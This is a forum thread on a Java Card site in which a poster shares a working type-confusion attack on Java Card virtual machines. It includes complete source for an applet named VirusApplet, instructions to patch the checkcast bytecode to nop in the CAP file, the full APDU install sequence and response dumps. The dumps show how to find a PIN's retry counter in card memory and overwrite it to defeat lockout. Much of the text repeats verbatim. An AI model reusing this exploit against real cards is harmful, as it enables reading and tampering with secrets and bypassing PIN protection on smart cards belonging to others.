JavacardOS will not accept order any more, please contact our partner Feitian online Store:
https://ftsafe.en.alibaba.com/index.html
https://ftsafe.en.alibaba.com/index.html
Research Findings about viciousness CAP file
- marjkbadboy
- Posts: 33
- Joined: Fri Jul 31, 2015 2:47 am
- Points :217
- Contact:
Research Findings about viciousness CAP file
Just share some research findings.Any comments, please feel free to address here.
This article describes an applet that can attack java cards. It introduces the key technology of this attack method in detail, and the specific operating steps and the purpose of each step as well.
Although this demo I demonstrated is not very useful, the purpose is to show you the feasibility of this attack technique, and you can do something useful with a little modification.
Firstly, I will introduce the principle of this attack example in the most brief way, then the applet source code and attack steps.
This article describes an applet that can attack java cards. It introduces the key technology of this attack method in detail, and the specific operating steps and the purpose of each step as well.
Although this demo I demonstrated is not very useful, the purpose is to show you the feasibility of this attack technique, and you can do something useful with a little modification.
Firstly, I will introduce the principle of this attack example in the most brief way, then the applet source code and attack steps.
It's hunting season!
- marjkbadboy
- Posts: 33
- Joined: Fri Jul 31, 2015 2:47 am
- Points :217
- Contact:
Re: Research Findings about viciousness CAP file
1. Principle
Create a byte array
Create a short array.
Type confusion (that is, assign an object of type A to an object of type B, and then access it in the way of type B)
Then now you can use shortArray to access byteArray. The data you can get is twice as much as before (because 1 short == 2 byte), which is the core of this attack technology.
Read all the 8 elements of the shortArray.
The first 8 zeros are the initial values of byteArray, and the next 8 data are extra read, because 8 shorts are twice as large as 8 bytes. What the attackers really want is the latter 8 bytes of data, because there may include sensitive data. Although it is unlikely that important information exists in these 8 bytes, if we enlarge the length of the byteArray, what will happen?
Try to do some tests to observe the change of the latter 8 bytes. The purpose is to locate the location of sensitive data, and then modify it. The modified method is through the shortArray too. For example, shortArray[4] = 1234, the original 32 03 is changed to 12 34.
The key technical point of the above is how to convert byte[]to short[]. Here are two steps:
(1)JAVA code
Although the above JAVA code is strange, it can be compiled normally. To complete the type confusion, please continue the following step.
(2) Manually modify CAP
Replace the checkcast command with nop, otherwise the VM will throw an exception directly when executing the “shortArray = (short[])tm” .
After the above two steps, you can read shortArray now.
Create a byte array
Code: Select all
char[] byteArray = new byte[8]; //The longer of the array you set, the more secret you can pry in the future.
Code: Select all
short[] shortArray = new byte[1]; //You can set this array with any length you want.
Code: Select all
shortArray = byteArray; //The specific method will be introduced later.
Read all the 8 elements of the shortArray.
Code: Select all
00 00 00 00 00 00 00 00 32 03 15 20 00 13 01 21
Try to do some tests to observe the change of the latter 8 bytes. The purpose is to locate the location of sensitive data, and then modify it. The modified method is through the shortArray too. For example, shortArray[4] = 1234, the original 32 03 is changed to 12 34.
The key technical point of the above is how to convert byte[]to short[]. Here are two steps:
(1)JAVA code
Code: Select all
byte[] byteArray;
short[] shortArray;
Object tm = byteArray;
shortArray = (short[])tm; // Generate checkcast command
(2) Manually modify CAP
Replace the checkcast command with nop, otherwise the VM will throw an exception directly when executing the “shortArray = (short[])tm” .
After the above two steps, you can read shortArray now.
It's hunting season!
- marjkbadboy
- Posts: 33
- Joined: Fri Jul 31, 2015 2:47 am
- Points :217
- Contact:
Re: Research Findings about viciousness CAP file
CAP code
Code: Select all
package Virus;
import javacard.framework.APDU;
import javacard.framework.ISO7816;
import javacard.framework.Applet;
import javacard.framework.ISOException;
import javacard.framework.Util;
import javacard.framework.OwnerPIN;
public class VirusApplet extends Applet
{
private final static byte READ_BYTE_ARRAY = 0x00;
private final static byte READ_SHORT_ARRAY = 0x01;
private final static byte TYPE_CONFUSION = 0x10;
private final static byte WRITE_DATA = 0x20;
private final static byte PIN_OPERATION = 0x30;
private final static byte PIN_OPERATION_P1_SET = 0x00;
private final static byte PIN_OPERATION_P1_VERIFY = 0x01;
private final static byte PIN_OPERATION_P1_GETTRY = 0x02;
private byte[] byteArray;
private short[] shortArray;
private OwnerPIN pin;
public VirusApplet()
{
byteArray = new byte[(short)0x0080];
shortArray = new short[(short)4];
pin = new OwnerPIN((byte)3, (byte)0x10);
for (short i = 0; i < byteArray.length; i++)
{
byteArray[i] = (byte)i;
}
for (short i = 0; i < shortArray.length; i++)
{
shortArray[i] = (short)0x4444;
}
}
public static void install(byte[] bArray, short bOffset, byte bLength)
{
// GP-compliant JavaCard applet registration
new Virus.VirusApplet().register(bArray, (short) (bOffset + 1), bArray[bOffset]);
}
public void process(APDU apdu)
{
// Good practice: Return 9000 on SELECT
if (selectingApplet())
{
return;
}
byte[] buf = apdu.getBuffer();
switch (buf[ISO7816.OFFSET_INS])
{
/*
* Read Array in bytes[]
* P1 - length
*/
case READ_BYTE_ARRAY:
Util.arrayCopy(byteArray, (short)0, buf, ISO7816.OFFSET_CDATA, buf[ISO7816.OFFSET_P1]);
apdu.setOutgoingAndSend(ISO7816.OFFSET_CDATA, buf[ISO7816.OFFSET_P1]);
break;
/*
* Read byteArray in short[]
* P1 - length
*/
case READ_SHORT_ARRAY:
for (short i = 0; i < buf[ISO7816.OFFSET_P1]; i++)
{
//When the 77 security COS executes shortArray[i], it can successfully detect that the VM is reading short[] in other types. That is to say, it’s being attacked, so resets directly.
buf[(short)(ISO7816.OFFSET_CDATA+i*2)] = (byte)(shortArray[i] >> 8);
buf[(short)(ISO7816.OFFSET_CDATA+i*2+1)] = (byte)shortArray[i];
}
apdu.setOutgoingAndSend(ISO7816.OFFSET_CDATA, (short)(buf[ISO7816.OFFSET_P1]*2));
break;
/*
*Confusion: There is a type modification here. Obviously, Java code here *is very strange, that’s because it’s used to tamper the type.
* 1. Java Code: Assign the value of byte[] to short[] forcibly by Object.
* 2. Replace the checkcast command in the CAP with the nop command manually.( Here, pls replace 94 0c with 00 00)
*/
case TYPE_CONFUSION:
Object tm = byteArray;
shortArray = (short[])tm; // Generate checkcast command
break;
/*
* Write command: Used to tamper sensitive data when locating sensitive *data
* P1 - offset
*/
case WRITE_DATA:
apdu.setIncomingAndReceive();
for (short i = 0; i < buf[ISO7816.OFFSET_LC] / 2; i+=2)
{
short tmp = buf[ISO7816.OFFSET_CDATA + 0];
tmp <<= 8;
tmp |= buf[ISO7816.OFFSET_CDATA + 0 + 1];
shortArray[(short)((byteArray.length/2)+buf[ISO7816.OFFSET_P1])] = tmp;
}
break;
/* PIN code operation
*The PIN code here is sensitive data, and can perform related operations * to observe the change of the data, even if it is wrong, so as to finally *locate the sensitive data.
*/
case PIN_OPERATION:
switch (buf[ISO7816.OFFSET_P1])
{
// Set PIN
case PIN_OPERATION_P1_SET:
apdu.setIncomingAndReceive();
pin.update(buf, (short)ISO7816.OFFSET_CDATA, (byte)8);
break;
// Verify PIN
case PIN_OPERATION_P1_VERIFY:
apdu.setIncomingAndReceive();
if (pin.check(buf, (short)ISO7816.OFFSET_CDATA, (byte)8) == false)
{
ISOException.throwIt(ISO7816.SW_WRONG_DATA);
}
break;
// Get available number of attempts of PIN code verification
case PIN_OPERATION_P1_GETTRY:
buf[ISO7816.OFFSET_CDATA] = pin.getTriesRemaining();
apdu.setOutgoingAndSend((short)ISO7816.OFFSET_CDATA, (short)1);
break;
default:
ISOException.throwIt(ISO7816.SW_INCORRECT_P1P2);
break;
}
break;
default:
// good practice: If you don't know the INStruction, say so:
ISOException.throwIt(ISO7816.SW_INS_NOT_SUPPORTED);
}
}
}
It's hunting season!
- marjkbadboy
- Posts: 33
- Joined: Fri Jul 31, 2015 2:47 am
- Points :217
- Contact:
Re: Research Findings about viciousness CAP file
Watch & Learn
1. Download and install applet
2. Send APDU command when attacking
=>RESET
=>00A40400 00
=>AUTH
=>80 e6 02 00 12 05 11 22 33 44 55 08 a0 00 00 00 03 00 00 00 00 00 00
=>80 e8 00 00 ef c4 82 02 68 01 00 15 de ca ff ed 02 02 04 00 01 05 11 22 33 44 55 05 56 69 72 75 73 02 00 21 00 15 00 21 00 0a 00 0b 00 4a 00 0e 01 76 00 0a 00 2a 00 00 00 91 04 44 00 00 00 00 00 00 01 01 00 04 00 0b 01 03 01 07 a0 00 00 00 62 01 01 03 00 0a 01 06 11 22 33 44 55 66 00 4a 06 00 0e 00 00 00 80 03 03 00 03 07 01 00 00 00 5e 07 01 76 00 05 11 18 8c 00 03 18 11 00 80 90 0b 87 00 18 07 90 0c 87 01 18 8f 00 04 3d 06 10 10 8c 00 05 87 02 03 30 70 0b ad 00 1d 1d 5b 38 59 01 01 1d ad 00 92 6c f3 03 30 70 0c ad 01 1d 11 44 44 39 59 01 01 1d ad 01 92 6c f2 7a 05 30 8f 00 06 3d 8c 00 07 18 1d 04 41 18 1d 25 8b 00 08 7a 06 24 18 8b 00 09 60 03 7a 19 8b 00 0a 2d 1a 04 25 75 01 00 00 05 00 00 00 19 00 01 00 30 00 10 00 67
=>80 e8 00 01 ef 00 20 00 75 00 30 00 b0 ad 00 03 1a 08 1a 05 25 8d 00 0b 3b 19 08 1a 05 25 8b 00 0c a8 00 d9 03 32 70 22 1a 08 1f 05 45 41 ad 01 1f 26 10 08 4f 5b 38 1a 08 1f 05 45 41 04 41 ad 01 1f 26 5b 38 59 03 01 1f 1a 05 25 6c dc 19 08 1a 05 25 05 45 8b 00 0c a8 00 a2 ad 00 2e 18 1b 00 00 00 00 87 01 a8 00 94 19 8b 00 0d 3b 03 29 04 70 28 1a 08 25 29 05 16 05 10 08 4d 29 05 16 05 1a 10 06 25 55 29 05 ad 01 ad 00 92 05 47 1a 05 25 41 16 05 39 59 04 02 16 04 1a 07 25 05 47 6c d3 70 58 1a 05 25 73 00 45 00 00 00 02 00 0d 00 1d 00 35 19 8b 00 0d 3b ad 02 1a 08 10 08 8b 00 0e 70 38 19 8b 00 0d 3b ad 02 1a 08 10 08 8b 00 0f 61 28 11 6a 80 8d 00 10 70 20 1a 08 ad 02 8b 00 11 38 19 08 04 8b 00 0c 70 10 11 6a 86 8d 00 10 70 08
=>80 e8 80 02 8e 11 6d 00 8d 00 10 7a 08 00 0a 00 00 00 00 00 00 00 00 00 00 05 00 4a 00 12 02 00 02 00 02 00 02 01 02 00 02 02 06 80 03 00 01 80 09 00 06 80 09 00 01 00 02 00 06 00 00 01 03 80 03 02 03 80 03 03 03 80 0a 01 06 80 10 01 03 80 0a 08 03 80 0a 06 03 80 09 08 03 80 09 01 06 80 07 01 03 80 09 02 09 00 2a 00 11 0e 06 0d 06 0a 09 0b 44 21 11 1c 09 24 02 2f 10 15 00 15 05 12 07 2f 04 0a 07 07 28 09 37 15 4b 0a 06 0a 08 09 07 08 08
=>80 e6 0c 00 1A 05 11 22 33 44 55 06 11 22 33 44 55 66 06 11 22 33 44 55 66 01 00 02 c9 00 00
=>00 a4 04 00 06 11 22 33 44 55 66
#Read data of byte[]
=>00007F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 90
00
#Type confusion byte[] -> short[]
=>00100000 00
#Read byte[] in short[] type
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 10 00 00 00
80 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 80 02 00 01 03 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Set PIN
=>00300000 08 1122334455667788
#Read byte[] in short[] type and observe changes of subsequent data
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 08 00 00 00
80 02 00 10 11 22 33 44 55 66 77 88 00 00 00 00
00 00 00 00 80 02 00 01 03 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Verify PIN and use the wrong PIN to locate triesLeft
=>00300100 08 1122334455667777
# Read byte[] in short[] type again and and observe changes of subsequent data
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 08 00 00 00
80 02 00 10 11 22 33 44 55 66 77 88 00 00 00 00
00 00 00 00 80 02 00 01 02 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Tamper triesLeft,P1 is offset of triesLeft.
Be careful in this step. If doing wrong operation, the card may not be used any more. 7F is the triesLeft after tampering. The following 01 is the original value of the latter byte of triesLeft in NVM. Our purpose is to write the bytes of triesLeft, but actually we have written a short, so we don't care about the latter byte, it must keep the original value.
=>00203200 02 7F01
1. Download and install applet
2. Send APDU command when attacking
=>RESET
=>00A40400 00
=>AUTH
=>80 e6 02 00 12 05 11 22 33 44 55 08 a0 00 00 00 03 00 00 00 00 00 00
=>80 e8 00 00 ef c4 82 02 68 01 00 15 de ca ff ed 02 02 04 00 01 05 11 22 33 44 55 05 56 69 72 75 73 02 00 21 00 15 00 21 00 0a 00 0b 00 4a 00 0e 01 76 00 0a 00 2a 00 00 00 91 04 44 00 00 00 00 00 00 01 01 00 04 00 0b 01 03 01 07 a0 00 00 00 62 01 01 03 00 0a 01 06 11 22 33 44 55 66 00 4a 06 00 0e 00 00 00 80 03 03 00 03 07 01 00 00 00 5e 07 01 76 00 05 11 18 8c 00 03 18 11 00 80 90 0b 87 00 18 07 90 0c 87 01 18 8f 00 04 3d 06 10 10 8c 00 05 87 02 03 30 70 0b ad 00 1d 1d 5b 38 59 01 01 1d ad 00 92 6c f3 03 30 70 0c ad 01 1d 11 44 44 39 59 01 01 1d ad 01 92 6c f2 7a 05 30 8f 00 06 3d 8c 00 07 18 1d 04 41 18 1d 25 8b 00 08 7a 06 24 18 8b 00 09 60 03 7a 19 8b 00 0a 2d 1a 04 25 75 01 00 00 05 00 00 00 19 00 01 00 30 00 10 00 67
=>80 e8 00 01 ef 00 20 00 75 00 30 00 b0 ad 00 03 1a 08 1a 05 25 8d 00 0b 3b 19 08 1a 05 25 8b 00 0c a8 00 d9 03 32 70 22 1a 08 1f 05 45 41 ad 01 1f 26 10 08 4f 5b 38 1a 08 1f 05 45 41 04 41 ad 01 1f 26 5b 38 59 03 01 1f 1a 05 25 6c dc 19 08 1a 05 25 05 45 8b 00 0c a8 00 a2 ad 00 2e 18 1b 00 00 00 00 87 01 a8 00 94 19 8b 00 0d 3b 03 29 04 70 28 1a 08 25 29 05 16 05 10 08 4d 29 05 16 05 1a 10 06 25 55 29 05 ad 01 ad 00 92 05 47 1a 05 25 41 16 05 39 59 04 02 16 04 1a 07 25 05 47 6c d3 70 58 1a 05 25 73 00 45 00 00 00 02 00 0d 00 1d 00 35 19 8b 00 0d 3b ad 02 1a 08 10 08 8b 00 0e 70 38 19 8b 00 0d 3b ad 02 1a 08 10 08 8b 00 0f 61 28 11 6a 80 8d 00 10 70 20 1a 08 ad 02 8b 00 11 38 19 08 04 8b 00 0c 70 10 11 6a 86 8d 00 10 70 08
=>80 e8 80 02 8e 11 6d 00 8d 00 10 7a 08 00 0a 00 00 00 00 00 00 00 00 00 00 05 00 4a 00 12 02 00 02 00 02 00 02 01 02 00 02 02 06 80 03 00 01 80 09 00 06 80 09 00 01 00 02 00 06 00 00 01 03 80 03 02 03 80 03 03 03 80 0a 01 06 80 10 01 03 80 0a 08 03 80 0a 06 03 80 09 08 03 80 09 01 06 80 07 01 03 80 09 02 09 00 2a 00 11 0e 06 0d 06 0a 09 0b 44 21 11 1c 09 24 02 2f 10 15 00 15 05 12 07 2f 04 0a 07 07 28 09 37 15 4b 0a 06 0a 08 09 07 08 08
=>80 e6 0c 00 1A 05 11 22 33 44 55 06 11 22 33 44 55 66 06 11 22 33 44 55 66 01 00 02 c9 00 00
=>00 a4 04 00 06 11 22 33 44 55 66
#Read data of byte[]
=>00007F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 90
00
#Type confusion byte[] -> short[]
=>00100000 00
#Read byte[] in short[] type
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 10 00 00 00
80 02 00 10 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 80 02 00 01 03 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Set PIN
=>00300000 08 1122334455667788
#Read byte[] in short[] type and observe changes of subsequent data
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 08 00 00 00
80 02 00 10 11 22 33 44 55 66 77 88 00 00 00 00
00 00 00 00 80 02 00 01 03 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Verify PIN and use the wrong PIN to locate triesLeft
=>00300100 08 1122334455667777
# Read byte[] in short[] type again and and observe changes of subsequent data
=>00017F00 00
<= 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
50 51 52 53 54 55 56 57 58 59 5a 5b 5c 5d 5e 5f
60 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f
70 71 72 73 74 75 76 77 78 79 7a 7b 7c 7d 7e 7f
a0 02 00 04 44 44 44 44 44 44 44 44 20 02 00 6d
01 00 00 a2 00 a4 00 a3 03 00 10 00 08 00 00 00
80 02 00 10 11 22 33 44 55 66 77 88 00 00 00 00
00 00 00 00 80 02 00 01 02 01 00 00 72 02 00 01
01 5e 00 90 2c 00 00 b0 01 00 00 a6 80 00 00 06
11 22 33 44 55 66 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 00
#Tamper triesLeft,P1 is offset of triesLeft.
Be careful in this step. If doing wrong operation, the card may not be used any more. 7F is the triesLeft after tampering. The following 01 is the original value of the latter byte of triesLeft in NVM. Our purpose is to write the bytes of triesLeft, but actually we have written a short, so we don't care about the latter byte, it must keep the original value.
=>00203200 02 7F01
It's hunting season!
Re: Research Findings about viciousness CAP file
Will study your research. Many thanks for sharing.
Re: Research Findings about viciousness CAP file
Thanks for sharing!
Who is online
Users browsing this forum: Bing [Bot] and 10 guests